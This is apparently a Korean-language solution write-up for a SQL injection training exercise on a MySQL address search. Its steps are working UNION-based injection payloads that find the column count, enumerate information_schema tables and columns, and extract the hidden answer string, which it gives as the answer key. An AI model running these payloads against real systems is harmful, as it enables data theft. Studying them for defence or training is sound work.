================================
* SQL Injection MySQL 문제 10번
================================

1. 풀이 과정
 1) 쿼리문 유추
- '문정'만 입력 시 문정이 포함된 주소가 출력
-> select 컬럼1, 컬럼2,...
from 주소 where 읍/면/동
like '%문정%' 의 형태로 유추 가능
 2) 공격 포인트 
- 문정동%' (공격구문)   %'
- 문정동%' and 'w%'='w 입력 시 문정동의 정보가 성공적으로 출력 되므로 문정도과 'w%'='w 사이에 공격구문 추가 가능
 3) Union 제약사항
- 문정동%' order by 1 # -> 데이터 안나올 때 까지(컬럼 5개)
- 문정동%' union select null, null, null, null, null from dual where 'r%'='r
문정동%' union select 'a', 'b', 'c', 'd', 'e' from dual where 'r%'='r -> 자료형 전부 문자형인 것 확인
 4) 테이블 명
- 문정동%' union select table_name,null,null,null,null from information_schema.TABLES where 'm%'='m 입력을 통해 테이블 명을 확인
- union_answer이 목표 테이블 명으로 가정
 5) 컬럼 명
- 문정동%' union select column_name,null,null,null,null from information_schema.columns where table_name = 'union_answer' and 'm%'='m
- 입력 후 answer_column 컬럼명 확인 가능
 6) 데이터 탈취
- 문정동%' union select answer_column, null, null, null, null from union_answer where 'm%'='m
- 입력 후 this_is_answer_answer 데이터 탈취

2. 정답
- this_is_answer_answer	
